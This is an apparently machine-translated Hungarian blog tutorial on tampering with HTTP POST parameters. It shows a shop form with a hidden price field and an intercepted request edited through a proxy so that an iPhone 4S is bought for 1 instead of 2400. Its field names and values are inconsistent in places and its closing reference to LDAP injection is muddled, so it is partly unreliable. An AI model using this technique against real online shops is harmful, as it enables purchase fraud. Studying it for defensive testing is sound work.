Intruzió behatolás: HTTP fejlécek alkalmazása

Admin · Közzétéve 2015. 02. 07. 17:59:07

Az HTTP fejlécek alkalmazásáról

A http fejlécet gyakran használják weboldalak továbbítási mechanizmusában, de a legtöbb kínai kezdő nem vette észre ezt a darabot, ez a cikk csak kezdőknek szól, a http fejléc szerepéről a behatolási folyamatban.

Vegyük példaként a vásárlási oldalt, hogy elemezzük a HTTP fejlécek szerepének egy kis részét.

Először is elemezzünk egy űrlapot a vásárlási oldalon.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br /> 

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<input type="hidden" name="price" value="449">

<input type="submit" value="Purchase">

</form>

A megnyitó folyamat során készíts képernyőképet a http üzenet fejlécéről, és nézd meg

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

mennyiség=1&ár=2400

Bár az ármező nem jelenik meg az oldalon a vásárlási oldal megnyitásakor, a felhasználó még mindig szerkesztheti és kezelheti.

Kétféleképpen lehet a szerkesztést elérni

1. Mentsd el a HTML forráskódot módosításhoz, majd töltsd be újra a böngészőbe a futtatáshoz

2. Használjon proxy interceptiont HTTP fejlécek módosításához (proxy építése a tool burp-ban)

Vegyük például a fenti HTTP fejlécet
A változás előtt
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

mennyiség=1&ár=2400

A változás után
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

mennyiség=1&ár=1

Az utolsó sorban az ár értéke 2400, és ha 1-re változtatjuk, olcsóbban is megkaphatjuk az iPhone 4S-et.

Ez a cikk csak egy képet ad váratlan előnyökről, mint például az LDAP injekció.

[Biztonsági oktató] Intruzió behatolás: HTTP fejlécek alkalmazása

Kapcsolódó bejegyzések

Megtekintett szakaszok